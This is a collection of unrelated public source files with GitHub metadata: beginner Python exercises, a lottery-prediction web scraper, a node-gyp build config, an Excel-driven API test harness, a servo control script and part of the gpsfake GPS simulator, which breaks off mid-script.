716ec0a6b94d4f593ef06d3217962033628574fa
|
/pytest/ex29.py
|
d31cae23ee22b3e59011e728a36bc07464e5233e
|
[] |
no_license
|
lunabird/MyPythonNote
|
fd1e327ad110257d73e0470ac64b521f85096342
|
248ed5bea9c74cd4ff86537df1d1080a7196c47a
|
refs/heads/master
| 2021-01-10T07:38:40.474217
| 2015-12-15T14:07:28
| 2015-12-15T14:07:28
| 47,493,197
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 471
|
py
|
#-*- coding:utf-8 -*-
people = 20
cats = 30
dogs = 15
if people<cats:
print "Too many cats! The world is doomed!"
if people>cats:
print "Not many cats! The world is saved!"
if people<dogs:
print "The world is drooled on."
if people>dogs:
print "The world is dry."
dogs+=5
if people >= dogs:
print "People are greater than or equal to dogs."
if people <= dogs:
print "People are less than or equal to dogs."
if people == dogs:
print "People are dogs."
|
[
"xd_huangpeng@163.com"
] |
xd_huangpeng@163.com
|
d9a441f1d7dee59f9626ffe6689b3011f88120bc
|
21c5729bb00920a16b8e8fdf6f0d2b472e5187f4
|
/8a.py
|
d196d67f3355b8dc2b2563d5d4a479cf14309199
|
[] |
no_license
|
abhinavdv/Codeforces_accepted_problems
|
b4d854a44070032754b60232249f215eb506e700
|
75f4f9e831613a75a70fa809eb519915248a96a2
|
refs/heads/master
| 2020-07-03T11:32:58.275150
| 2019-08-26T16:22:10
| 2019-08-26T16:22:10
| 201,892,863
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 324
|
py
|
a=input()
b=input()
c=input()
m=0
n=0
if (a.find(b)!= -1 and a.find(c)!= -1):
k=a.index(b)
l=a.index(c)
if k<l:
m=m+1
rev = a[::-1]
o=rev.index(b)
p=rev.index(c)
if o<p:
n=n+1
else:
print("fantasy")
if m!=0 and n==1:
print("both")
elif m==0 and n==1:
print("backward")
elif m==0 and n==1:
print("forward")
|
[
"dvabhinav31@gmail.com"
] |
dvabhinav31@gmail.com
|
8d4d7d1f3a18b0f2e9716fc6207a59a31bae902a
|
e3d50f9ae8a3b7121b09a578483b7b72e0aa4d16
|
/spider_pk/append_predict/predict_append_rule_100_jump_continue4_base_min.py
|
38998128f4d236cbb06d90eeeb38e7fec43d8ff6
|
[] |
no_license
|
knightsss/xyft
|
e17257a9d4736232714097f2adddae3ea4edef3a
|
916fb3a99db3d6a65dbba2b6e72c78142b8ca2b2
|
refs/heads/master
| 2020-06-28T10:16:08.851545
| 2019-08-02T09:33:15
| 2019-08-02T09:33:15
| 200,207,521
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,420
|
py
|
#coding=utf-8
__author__ = 'shifeixiang'
import time
from selenium import webdriver
from bs4 import BeautifulSoup
from append_predict.models import KillPredict
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from pkten_log.pk_log import PkLog
pk_logger = PkLog('append_predict.predict_append_rule_100').log()
#获取predict driver
def spider_predict_selenium():
driver_flag = True
while(driver_flag):
driver = webdriver.Firefox(executable_path = './pkten_log/geckodriver.exe')
driver.get("https://www.1399p.com/pk10/shdd")
try:
element = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.CLASS_NAME , "lotteryNumber")))
driver_flag = False
return driver
except:
print "get driver time out"
driver.quit()
time.sleep(10)
#获取10个名次的soup 列表
def get_soup_list(interval):
count = 0
flag = True
while(flag):
try:
soup_list = []
driver = interval["driver"]
driver.get("https://www.1399p.com/pk10/shdd")
try:
element = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.CLASS_NAME , "lotteryNumber")))
time.sleep(1)
#driver.maximize_window();
# driver.manage().window().maximize();
time.sleep(1)
js = "var q=document.documentElement.scrollTop=300"
driver.execute_script(js)
#print "scroll finish!"
pk_logger.info("scroll finish!")
#处理100期
#print 'click select'
pk_logger.info("click select")
driver.find_element_by_class_name('colorWorld_selectJtou').click()
time.sleep(1)
#print 'click 10'
#driver.find_element_by_xpath('/html/body/div[3]/div[2]/div/div/div[1]/div/div/div/div/span[1]').click()
#print 'click 100'
pk_logger.info("click 100")
driver.find_element_by_xpath('/html/body/div[3]/div[2]/div/div/div[1]/div/div/div/div/span[4]').click()
time.sleep(2)
#处理完成
for i in range(10):
'/html/body/div[3]/div[2]/div/div/div[2]/div[2]/span[1]/span'
driver.find_element_by_xpath('/html/body/div[3]/div[2]/div/div/div[2]/div[2]/span[' + str(i+1) + ']/span').click()
time.sleep(4)
soup = BeautifulSoup(driver.page_source)
soup_list.append(soup)
return soup_list
except:
pk_logger.error("get sub driver time out")
#print "get sub driver time out"
driver.quit()
pk_logger.error("spider predict faild!")
#print "spider predict faild!"
time.sleep(3)
interval["driver"] = spider_predict_selenium()
if count > 2:
flag = False
except:
driver.quit()
#print "spider predict faild!"
pk_logger.error("spider predict faild!")
time.sleep(3)
interval["driver"] = spider_predict_selenium()
if count > 2:
flag = False
count = count + 1
return []
#基于一个名次soup 获取预测号码列表 ,杀号率列表,期号
def get_kill_purchase_list(soup):
count = 1
percent_list = []
number_list = []
number_str_all_list = []
prev_number_list = []
hit_number = 0
#每个名次命中率列表
continue_hit_list = []
all_continue_hit_number = 0
for tr in soup.find(class_='lotteryPublic_tableBlock').find_all('tr'):
#百分比
if count == 1:
p_percent = 0
current_percent_all = 30
for td in tr.find_all(class_='font_red'):
if p_percent < 10:
value = float(str(td.string).strip().replace("%",""))
percent_list.append(value)
if p_percent == 10:
current_percent_all = float(str(td.string).strip().replace("%",""))
p_percent = p_percent + 1
#当前连中个数
if count == 2:
p_continue_hit = 0
for td in tr.find_all(class_='font_blue0f'):
#前10个为10个名次的连中个数
if p_continue_hit < 10:
value = int(str(td.string))
#pk_logger.info("continue hit number:%d", value)
continue_hit_list.append(value)
#总连续命中个数
if p_continue_hit == 10:
all_continue_hit_number = int(str(td.string))
#pk_logger.info("all continue hit number:%d", all_continue_hit_number)
p_continue_hit = p_continue_hit + 1
if count == 5:
p_number = 0
for td in tr.find_all('td'):
if p_number == 0:
protty_id = td.string
if p_number > 1 and p_number < 12:
value = int(td.string)
number_list.append(value)
number_str_all_list.append(str(value))
p_number = p_number + 1
#前一期
if count == 6:
p_number = 0
for td in tr.find_all('td'):
if p_number == 0:
pre_protty_id = td.string
if p_number == 1:
hit_number = td.string
if p_number > 1 and p_number < 12:
value = int(td.string)
prev_number_list.append(str(value))
p_number = p_number + 1
count = count + 1
#无论是否全部杀号正确,都计算
#kill_flag = True
#用于判断是否通过全中过滤
kill_all_flag = False
#print "number_list:",number_list
pk_logger.info("number_list: %s" , number_list)
#print "last hit_number is:",hit_number,' ',prev_number_list
#未全部杀中
if hit_number in prev_number_list:
kill_all_flag = False
#全部杀中
else:
kill_all_flag = True
return protty_id,percent_list,number_list,number_str_all_list,kill_all_flag,current_percent_all,all_continue_hit_number
#基于一个名次soup 获取预测杀号率列表 总杀号率 总连中个数
def get_min_current_percent_all_and_continue_hit(soup):
count = 1
continue_hit_list = []
all_continue_hit_number = 0
for tr in soup.find(class_='lotteryPublic_tableBlock').find_all('tr'):
if count == 1:
p_percent = 0
for td in tr.find_all(class_='font_red'):
if p_percent == 10:
current_percent_all = float(str(td.string).strip().replace("%",""))
p_percent = p_percent + 1
#print "current_percent_all:",current_percent_all
#当前连中个数
if count == 2:
p_continue_hit = 0
for td in tr.find_all(class_='font_blue0f'):
#前10个为10个名次的连中个数
if p_continue_hit < 10:
value = int(str(td.string))
#pk_logger.info("continue hit number:%d", value)
continue_hit_list.append(value)
#总连续命中个数
if p_continue_hit == 10:
all_continue_hit_number = int(str(td.string))
#pk_logger.info("all continue hit number:%d", all_continue_hit_number)
p_continue_hit = p_continue_hit + 1
count = count + 1
return current_percent_all,all_continue_hit_number
#号码处理,排名前6的号码过滤,剩余的号码购买
def max_min_deal(percent_list,number_list, kill_list, purchase_list, current_percent_all):
if current_percent_all < 50:
last_number = list(set(number_list))
# elif current_percent_all>= 40:
# #杀掉号码,取前6名作为杀号码
# for i in range(10):
# max_percent = max(percent_list)
# index = percent_list.index(max_percent)
# percent_list.remove(max_percent)
# number_value = number_list.pop(index)
# kill_list.append(number_value)
# #预留号码
# for i in range(10):
# purchase_list.append(int(i+1))
# last_number = list(set(purchase_list) - set(kill_list))
else:
last_number = []
number_str = ''
if len(last_number)>0:
count = 0
for number in last_number:
if count == len(last_number)-1:
number_str = number_str + str(number)
else:
number_str = number_str + str(number) + '|'
count = count + 1
return number_str
else:
return '0'
#获取需要购买的号码列表,每一名次为一个小列表
def get_purchase_list(interval, last_purchase_hit, xiazhu_nums):
soup_list = get_soup_list(interval)
purchase_number_list = ''
purchase_number_list_desc = ''
predict_number_all_list = []
protty_id = 0
count = 0
page_count_index = 1
purchase_mingci_number = 1
#获取最小的总百分比
current_percent_all_min = 50
current_percent_all_list = []
current_all_continue_hit_max = 0
current_all_continue_hit_list = []
for soup in soup_list:
#获取总百分比,获取总连续命中
current_percent_all,all_continue_hit_number = get_min_current_percent_all_and_continue_hit(soup)
current_percent_all_list.append(current_percent_all)
current_all_continue_hit_list.append(all_continue_hit_number)
pk_logger.info("current_percent_all: %s" , current_percent_all)
pk_logger.info("all_continue_hit_number: %s" , all_continue_hit_number)
#排序,找出最小的命中率
if current_percent_all_min > current_percent_all:
current_percent_all_min = current_percent_all
#排序,找出最大的连中次数
if current_all_continue_hit_max < all_continue_hit_number:
current_all_continue_hit_max = all_continue_hit_number
current_percent_all_min = sorted(current_percent_all_list)[0]
current_percent_all_second_min = sorted(current_percent_all_list)[1]
pk_logger.info("current_percent_all_min: %s" , current_percent_all_min)
pk_logger.info("current_percent_all_second_min: %s" , current_percent_all_second_min)
#第一名与次名相差8,这使用次名作为最小值
if current_percent_all_second_min - current_percent_all_min >= 8:
current_percent_all_min = current_percent_all_second_min
current_percent_all_list_str = str(current_percent_all_list)
#print "current_percent_all_min:",current_percent_all_min
pk_logger.info("current_percent_all_min: %s" , current_percent_all_min)
pk_logger.info("current_all_continue_hit_max: %s" , current_all_continue_hit_max)
#循环遍历,满足条件的提取出来
for soup in soup_list:
protty_id, percent_list,number_list,number_str_all_list,kill_all_flag,current_percent_all,all_continue_hit_number = get_kill_purchase_list(soup)
current_number_all = "|".join(number_str_all_list)
predict_number_all_list.append(current_number_all)
kill_list = []
purchase_list = []
#有大于等于连续3期命中的,跳转过去
if current_all_continue_hit_max > 3 :
if all_continue_hit_number == current_all_continue_hit_max:
pk_logger.info("jump to continue hit:%d",current_all_continue_hit_max)
purchase_number = max_min_deal(percent_list, number_list, kill_list, purchase_list, current_percent_all)
purchase_mingci_number = page_count_index
#防止有相同的最大连中名次,多次购买。
current_all_continue_hit_max = current_all_continue_hit_max + 1
else:
purchase_number = '0'
#没有4期连中的情况
else:
#上期命中情况
if (last_purchase_hit):
#最小的购买
if current_percent_all == current_percent_all_min:
#最小和次小的购买
#if current_percent_all <= current_percent_all_second_min:
#print "last hit"
pk_logger.info("last hit")
purchase_number = max_min_deal(percent_list, number_list, kill_list, purchase_list, current_percent_all)
purchase_mingci_number = page_count_index
#防止有相同的最小名次,多次购买。
current_percent_all_min = 0
else:
purchase_number = '0'
#上期未命中情况
else:
#使用同一未中名次
#if xiazhu_nums == page_count_index:
#按照排名最小的取值
if current_percent_all == current_percent_all_min:
#最小和次小的购买
#if current_percent_all <= current_percent_all_second_min:
#print "last not hit"
pk_logger.info("last not hit")
purchase_number = max_min_deal(percent_list, number_list, kill_list, purchase_list, current_percent_all)
purchase_mingci_number = page_count_index
#防止有相同的最小名次,多次购买。
current_percent_all_min = 0
else:
purchase_number = '0'
if count == len(soup_list) - 1:
purchase_number_list = purchase_number_list + str(purchase_number)
purchase_number_list_desc = purchase_number_list_desc + '[' + str(purchase_number) + ']'
else:
purchase_number_list = purchase_number_list + str(purchase_number) + ','
purchase_number_list_desc = purchase_number_list_desc + '[' + str(purchase_number) + ']---,'
count = count + 1
page_count_index = page_count_index + 1
predict_number_all_list_str = ",".join(predict_number_all_list)
return protty_id, purchase_number_list, purchase_number_list_desc, predict_number_all_list_str, current_percent_all_list_str, purchase_mingci_number
def get_last_number_predict_kill_result(protty_id,index):
last_protty_id = int(protty_id) - 1
try:
p = KillPredict.objects.get(lottery_id=last_protty_id)
number_all_list = p.predict_number_all.split(',')[index]
number_hit = str(int(p.lottery_number.split(',')[index]))
#print "number_hit,number_all_list ",number_hit,number_all_list
pk_logger.info("number_hit:%s", number_hit)
pk_logger.info("number_all_list:%s", number_all_list)
if number_hit in number_all_list:
# print "no kill all"
return False
else:
# print "kill all"
return True
except:
#print "kill error"
pk_logger.info("kill error")
return False
|
[
"shifeixiang@37.com"
] |
shifeixiang@37.com
|
cf7db30b318d32e7d7706d2e98d223adbaa4159a
|
4ee14633e17169d1775967e84331ba4bfd52ea2c
|
/my-yapi/vendors/node_modules/dtrace-provider/src/build/config.gypi
|
abee38e00bbbaa66cb38ac16a131c73a62bccce0
|
[
"Apache-2.0",
"BSD-2-Clause"
] |
permissive
|
iQuanhe/ice-ts
|
cd848e4684a6afef4a231ff6b8c3e71d4c8126ee
|
0ed5240d29e4da5914a3761ea02a908c4644cdd2
|
refs/heads/master
| 2023-01-29T05:07:32.978636
| 2020-09-07T07:30:27
| 2020-09-07T07:30:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,476
|
gypi
|
# Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"asan": 0,
"build_v8_with_gn": "false",
"coverage": "false",
"debug_nghttp2": "false",
"enable_lto": "false",
"force_dynamic_crt": 0,
"host_arch": "x64",
"icu_data_in": "../../deps/icu-small/source/data/in/icudt62l.dat",
"icu_endianness": "l",
"icu_gyp_path": "tools/icu/icu-generic.gyp",
"icu_locales": "en,root",
"icu_path": "deps/icu-small",
"icu_small": "true",
"icu_ver_major": "62",
"llvm_version": "0",
"node_byteorder": "little",
"node_debug_lib": "false",
"node_enable_d8": "false",
"node_enable_v8_vtunejit": "false",
"node_install_npm": "true",
"node_module_version": 64,
"node_no_browser_globals": "false",
"node_prefix": "/",
"node_release_urlbase": "https://nodejs.org/download/release/",
"node_shared": "false",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_nghttp2": "false",
"node_shared_openssl": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_target_type": "executable",
"node_use_bundled_v8": "true",
"node_use_dtrace": "true",
"node_use_etw": "false",
"node_use_openssl": "true",
"node_use_pch": "false",
"node_use_perfctr": "false",
"node_use_v8_platform": "true",
"node_with_ltcg": "false",
"node_without_node_options": "false",
"openssl_fips": "",
"openssl_no_asm": 0,
"shlib_suffix": "64.dylib",
"target_arch": "x64",
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_enable_inspector": 1,
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 0,
"v8_promise_internal_field_count": 1,
"v8_random_seed": 0,
"v8_trace_maps": 0,
"v8_typed_array_max_size_in_heap": 0,
"v8_use_snapshot": "true",
"want_separate_host_toolset": 0,
"xcode_version": "7.0",
"nodedir": "/Users/luyan1/.node-gyp/10.10.0",
"standalone_static_library": 1,
"dry_run": "",
"save_dev": "",
"legacy_bundling": "",
"only": "",
"viewer": "man",
"browser": "",
"commit_hooks": "true",
"also": "",
"rollback": "true",
"sign_git_commit": "",
"audit": "true",
"usage": "",
"globalignorefile": "/Users/luyan1/.nvm/versions/node/v10.10.0/etc/npmignore",
"shell": "/bin/bash",
"maxsockets": "50",
"init_author_url": "",
"metrics_registry": "https://registry.npm.taobao.org/",
"parseable": "",
"shrinkwrap": "true",
"timing": "",
"init_license": "ISC",
"if_present": "",
"init_author_email": "",
"sign_git_tag": "",
"cache_max": "Infinity",
"cert": "",
"local_address": "",
"long": "",
"git_tag_version": "true",
"preid": "",
"fetch_retries": "2",
"noproxy": "",
"registry": "https://registry.npm.taobao.org/",
"key": "",
"message": "%s",
"versions": "",
"globalconfig": "/Users/luyan1/.nvm/versions/node/v10.10.0/etc/npmrc",
"prefer_online": "",
"always_auth": "",
"logs_max": "10",
"cache_lock_retries": "10",
"global_style": "",
"update_notifier": "true",
"heading": "npm",
"audit_level": "low",
"offline": "",
"searchlimit": "20",
"read_only": "",
"fetch_retry_mintimeout": "10000",
"json": "",
"access": "",
"allow_same_version": "",
"engine_strict": "",
"description": "true",
"https_proxy": "",
"userconfig": "/Users/luyan1/.npmrc",
"init_module": "/Users/luyan1/.npm-init.js",
"cidr": "",
"user": "501",
"node_version": "10.10.0",
"save": "true",
"editor": "vi",
"ignore_prepublish": "",
"auth_type": "legacy",
"tag": "latest",
"script_shell": "",
"global": "",
"progress": "true",
"searchstaleness": "900",
"ham_it_up": "",
"optional": "true",
"save_prod": "",
"bin_links": "true",
"force": "",
"searchopts": "",
"depth": "Infinity",
"node_gyp": "/Users/luyan1/.nvm/versions/node/v10.10.0/lib/node_modules/npm/node_modules/node-gyp/bin/node-gyp.js",
"sso_poll_frequency": "500",
"rebuild_bundle": "true",
"unicode": "true",
"fetch_retry_maxtimeout": "60000",
"strict_ssl": "true",
"ca": "",
"tag_version_prefix": "v",
"scripts_prepend_node_path": "warn-only",
"sso_type": "oauth",
"save_prefix": "^",
"dev": "",
"group": "20",
"save_exact": "",
"fetch_retry_factor": "10",
"prefer_offline": "",
"cache_lock_stale": "60000",
"version": "",
"otp": "",
"cache_min": "10",
"cache": "/Users/luyan1/.npm",
"searchexclude": "",
"color": "true",
"package_lock": "true",
"package_lock_only": "",
"save_optional": "",
"ignore_scripts": "",
"user_agent": "npm/6.4.1 node/v10.10.0 darwin x64",
"cache_lock_wait": "10000",
"production": "true",
"save_bundle": "",
"send_metrics": "",
"umask": "0022",
"node_options": "",
"init_version": "1.0.0",
"git": "git",
"scope": "",
"init_author_name": "",
"tmp": "/var/folders/yb/wrtmydss1j5gyj6h33z71nl40000gn/T",
"onload_script": "",
"unsafe_perm": "true",
"link": "",
"prefix": "/Users/luyan1/.nvm/versions/node/v10.10.0"
}
}
|
[
"luyan1@staff.weibo.com"
] |
luyan1@staff.weibo.com
|
0072ba9cedb27f7e03c1dc9b59e97765a1279d1b
|
17fd2fc45800b9bdec008ec235749263cd7412f5
|
/common/base_api.py
|
8f75a60ff280208d7e025d8144c7f1bb804f649b
|
[] |
no_license
|
luffy000000/excelddtdriver
|
78395bd74fc0ef178e9c0527371b1f72cb95ac99
|
c891678aea0983b048779ccccd51b7d288b9bd8f
|
refs/heads/master
| 2020-05-07T19:14:16.355383
| 2019-04-11T14:16:39
| 2019-04-11T14:28:55
| 180,804,253
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,774
|
py
|
from common.writeexcel import Write_excel
import json
def send_requests(s, testdata):
# 封装requests请求
method = testdata["method"]
url = testdata["url"]
# url后面的params参数
try:
params = eval(testdata["params"])
except:
params = None
# 请求头部headers
try:
headers = eval(testdata["headers"])
print("请求头部: %s" % headers)
except:
headers = None
# post请求body类型
type = testdata["type"]
test_num = testdata['id']
print("******正在执行用例: ------ %s ------******" % test_num)
print("请求方式: %s, 请求url: %s" % (method, url))
print("请求params: %s" % params)
# post请求body内容
try:
bodydata = eval(testdata["body"])
except:
bodydata = {}
# 判断传data数据还是json
if type == "data":
body = bodydata
elif type == "json":
body = json.dumps(bodydata)
else:
body = bodydata
if method == "post":
print("post请求body类型为: %s, body内容为: %s" % (type, body))
verify = False
res = {} # 接受返回数据
try:
r = s.request(method=method,
url=url,
params=params,
headers=headers,
data=body,
verify=verify
)
print("页面返回信息: %s" % r.content.decode("utf-8"))
res['id'] = testdata['id']
res['rowNum'] = testdata['rowNum']
res["statuscode"] = str(r.status_code) # 状态码转成str
res["text"] = r.content.decode("utf-8")
res["times"] = str(r.elapsed.total_seconds()) # 接口请求时间转换成str
if res["statuscode"] != "200":
res["error"] = res["text"]
else:
res["error"] = ""
res["msg"] = ""
if testdata["checkpoint"] in res["text"]:
res["result"] = "pass"
print("用例测试结果: %s---->%s" % (test_num, res["result"]))
else:
res["result"] = "fail"
return res
except Exception as msg:
res["msg"] = str(msg)
return res
def write_result(result, filename="result.xlsx"):
# 返回结果的行数row_num
row_num = result['rowNum']
# 写入statuscode
wt = Write_excel(filename)
wt.write(row_num, 8, result['statuscode']) # 写入返回状态码statuscode,第8列
wt.write(row_num, 9, result['times']) # 耗时
wt.write(row_num, 10, result['error']) # 状态码非200时的返回信息
wt.write(row_num, 12, result['result']) # 测试结果pass还是fail
wt.write(row_num, 13, result['msg']) # 抛异常
|
[
"luffy000000@126.com"
] |
luffy000000@126.com
|
91a3ba73412a6987c81b0bd4f2238ff1b57396a4
|
5ec89657143f814423e5488dbda04b58cca2e3fd
|
/tartangan/kubeflow/download_dataset.py
|
73c3d94bbd2e3a44082c804f262463932130f875
|
[
"MIT"
] |
permissive
|
awentzonline/tartangan
|
c9f17e20e63c00eb2f5c30d6fdc3781e3b3ae600
|
2d36a81fa0ae91fe6b9b4e1f26763285630837fb
|
refs/heads/master
| 2023-07-20T05:48:16.762483
| 2020-11-08T09:30:09
| 2020-11-08T09:30:52
| 229,628,075
| 0
| 0
|
MIT
| 2023-07-06T21:36:22
| 2019-12-22T20:39:59
|
Python
|
UTF-8
|
Python
| false
| false
| 831
|
py
|
import smart_open
from .base_metadata_app import BaseMetadataApp
class DownloadDatasetMetadata(BaseMetadataApp):
def run(self):
super().run()
datasets = self.find_metadata_datasets_by_name(self.args.dataset_name)
# TODO: need to sort to get latest?
dataset = datasets[-1]
with smart_open.open(dataset['uri'], 'rb') as infile:
with smart_open.open(self.args.output_path, 'wb') as outfile:
outfile.write(infile.read())
@classmethod
def add_args_to_parser(cls, p):
super().add_args_to_parser(p)
p.add_argument('dataset_name', help='Name of metadata entity')
p.add_argument('output_path', help='Where the corresponding files go')
def main():
DownloadDatasetMetadata.run_from_cli()
if __name__ == '__main__':
main()
|
[
"adam@vody.com"
] |
adam@vody.com
|
baf5a5f484dba86ab66d7b9c8dcff33a2118f523
|
a853fae5335d3f943e83b3cb7a9baaa64cb9ed42
|
/9. Servo Motor/servo_2.py
|
bfc0b13241864883fd06510be582e05ad59dbddd
|
[] |
no_license
|
SharjeelBaig0508/Internet-of-Things
|
8b6739a6337b1f1275d479da38e58e3ab79fc63c
|
70b06565f452a3d9e1f127d69a72c7b8c202a666
|
refs/heads/main
| 2023-06-14T06:51:46.249823
| 2021-07-12T20:31:18
| 2021-07-12T20:31:18
| 385,369,448
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 405
|
py
|
import RPi.GPIO as GPIO
from time import sleep
slow=0.01
GPIO.setmode(GPIO.BOARD)
GPIO.setup(3, GPIO.OUT)
pwm=GPIO.PWM(3, 50)
pwm.start(0)
pwm.ChangeDutyCycle(2)
while 1:
for x in range(0, 180):
y=1./18.*(x)+2
pwm.ChangeDutyCycle(y)
sleep(slow)
for x in range(180, 0, -1):
y=1./18.*(x)+2
pwm.ChangeDutyCycle(y)
sleep(slow)
pwm.stop()
GPIO.cleanup()
|
[
"noreply@github.com"
] |
SharjeelBaig0508.noreply@github.com
|
6b3aebc3cccb73e61b938e010c8db365d463fd19
|
78aaf4ddbb126cf5ef78ed6c9485597c96282f7b
|
/gpsfake
|
145c7bccb0d82f9bb8a1d2636b2987e8b8989fbb
|
[
"ISC",
"LicenseRef-scancode-ibm-dhcp",
"BSD-3-Clause"
] |
permissive
|
szzso/GPSD-with-management
|
cbe1766c0b96ca4cef17cedd0d68ba3f1ebb0409
|
9bfab35044861290c271ff559addebe022b26269
|
refs/heads/master
| 2021-01-21T15:13:27.318281
| 2018-04-17T18:45:31
| 2018-04-17T18:45:31
| 91,834,565
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,683
|
#!/usr/bin/env python2
#
# gpsfake -- test harness for gpsd
#
# Simulates one or more GPSes, playing back logfiles.
# Most of the logic for this now lives in gps.fake,
# factored out so we can write other test programs with it.
#
# This file is Copyright (c) 2010 by the GPSD project
# BSD terms apply: see the file COPYING in the distribution root for details.
import getopt
import gps
import gps.fake as gpsfake # The "as" pacifies pychecker
import os
import platform
import pty
import time
import socket
import sys
import Queue
from tempfile import NamedTemporaryFile
from threading import Thread
from random import randint
class TCPThread(Thread):
def __init__(self, queue, managementport):
''' Constructor. '''
Thread.__init__(self)
self.queue = queue
self.running = True
self.daemon = True
self.port = managementport
# Function for handling connections. This will be used to create threads
def clientthread(self, conn):
# Sending message to connected client
conn.send('Welcome to the Gpsfake management interface.\n') # send only takes string
file = False
manual = False
self.tmp = ""
# infinite loop so that function do not terminate and thread do not end.
while self.running:
# Receiving from client
try:
data = conn.recv(1024)
if "file-begin" in data:
print "File comming"
file = True
f = NamedTemporaryFile(delete=False)
data.replace('file-begin', '')
f.write(data)
continue
elif "file-end" in data:
print "File arrived"
file = False
conn.sendall("OK... file recived")
path = f.name
data = data.replace('file-end', '')
f.write(data)
f.close()
self.queue.put("file," + path)
reply = 'OK...file recived'
conn.sendall(reply)
continue
elif "manual-begin" in data:
print "Manual begin"
manual = True
data = data.replace('manual-begin', '')
self.queue.put("manual-begin")
path = 'manualTrack.nmea'
self.f = open(path, 'wt')
data.replace('file-begin', '')
self.readNMEA(data, self.tmp)
elif "manual-end" in data:
print "Manual-end"
manual = False
data = data.replace('manual-end', '')
self.readNMEA(data, self.tmp)
self.f.close()
self.queue.put("manual-end")
elif file:
f.write(data)
elif manual:
self.readNMEA(data, self.tmp)
elif data:
self.queue.put(data)
reply = 'OK...' + data
conn.sendall(reply)
#print 'From client ' + data
elif not data:
print "No data: " + data
break
except socket.error as ex:
if str(ex) == "[Errno 35] Resource temporarily unavailable":
time.sleep(0)
continue
raise ex
# came out of loop
print 'Close listening'
def readNMEA(self, data, tmp):
if tmp != "":
data = tmp + data
tmp = ""
if "$" in data:
# print "Data: " + data
sentence = data.split('/n')
for i in sentence:
#print i
self.f.write(i)
if not "*" in i:
tmp += i
print "tmp: "+ tmp
else:
self.queue.put(i)
def run(self):
HOST = '' # Symbolic name meaning all available interfaces
#PORT = 8888
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
print 'Socket created'
# Bind socket to local host and port
try:
soc.bind((HOST, self.port))
except socket.error as msg:
print 'Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
sys.exit()
print 'Socket bind complete'
# Start listening on socket
soc.listen(1)
print 'Socket now listening'
# now keep talking with the client
while self.running:
try:
# wait to accept a connection - blocking call
conn, addr = soc.accept()
print 'Connected with ' + addr[0] + ':' + str(addr[1])
self.clientthread(conn)
except socket.error as msg:
if msg[0] == 104:
print "Disconnected client: " + addr[0] + ':' + str(addr[1])
else:
print msg
finally:
conn.close()
conn.close()
print 'Close thread'
class Baton:
"Ship progress indications to stderr."
# By setting this > 1 we reduce the frequency of the twirl
# and speed up test runs. Should be relatively prime to the
# nunber of baton states, otherwise it will cause beat artifacts
# in the twirling.
SPINNER_INTERVAL = 11
def __init__(self, prompt, endmsg=None):
self.stream = sys.stderr
self.stream.write(prompt + "...")
if os.isatty(self.stream.fileno()):
self.stream.write(" \b")
self.stream.flush()
self.count = 0
self.endmsg = endmsg
self.time = time.time()
return
def twirl(self, ch=None):
if self.stream is None:
return
if os.isatty(self.stream.fileno()):
if ch:
self.stream.write(ch)
self.stream.flush()
elif self.count % Baton.SPINNER_INTERVAL == 0:
self.stream.write("-/|\\"[self.count % 4])
self.stream.write("\b")
self.stream.flush()
self.count = self.count + 1
return
def end(self, msg=None):
if msg is None:
msg = self.endmsg
if self.stream:
self.stream.write("...(%2.2f sec) %s.\n" % (time.time() - self.time, msg))
return
def hexdump(s):
rep = ""
for c in s:
rep += "%02x" % ord(c)
return rep
def fakehook(linenumber, fakegps):
if len(fakegps.testload.sentences) == 0:
print >>sys.stderr, "fakegps: no sentences in test load."
raise SystemExit, 1
if linenumber % len(fakegps.testload.sentences) == 0:
if singleshot and linenumber > 0:
return False
if progress:
baton.twirl('*\b')
#elif not singleshot:
#sys.stderr.write("gpsfake: log cycle of %s begins.\n" % fakegps.testload.name)
time.sleep(cycle)
if linedump and fakegps.testload.legend:
ml = fakegps.testload.sentences[linenumber % len(fakegps.testload.sentences)].strip()
if not fakegps.testload.textual:
ml = hexdump(ml)
announce = fakegps.testload.legend % (linenumber % len(fakegps.testload.sentences) + 1) + ml
if promptme:
raw_input(announce + "? ")
else:
print announce
if progress:
baton.twirl()
return True
if __name__ == '__main__':
try:
(options, arguments) = getopt.getopt(sys.argv[1:], "1bc:D:ghilm:no:pP:rfM:s:StTuvx")
except getopt.GetoptError, msg:
print "gpsfake: " + str(msg)
raise SystemExit, 1
port = None
progress = False
cycle = 0
monitor = ""
speed = 4800
linedump = False
predump = False
pipe = False
singleshot = False
promptme = False
client_init = '?WATCH={"json":true,"nmea":true}'
doptions = ""
tcp = False
udp = False
verbose = 0
slow = False
managementport = None
management = False
withoutfile = False
for (switch, val) in options:
if switch == '-1':
singleshot = True
elif switch == '-b':
progress = True
elif switch == '-c':
cycle = float(val)
elif switch == '-D':
doptions += " -D " + val
elif switch == '-g':
monitor = "xterm -e gdb -tui --args "
elif switch == '-i':
linedump = promptme = True
elif switch == '-l':
linedump = True
elif switch == '-m':
monitor = val + " "
elif switch == '-n':
doptions += " -n"
elif switch == '-x':
predump = True
elif switch == '-o':
doptions = val
elif switch == '-p':
pipe = True
elif switch == '-P':
port = int(val)
elif switch == '-r':
client_init = val
elif switch == '-s':
speed = int(val)
elif switch == '-S':
slow = True
elif switch == '-t':
tcp = True
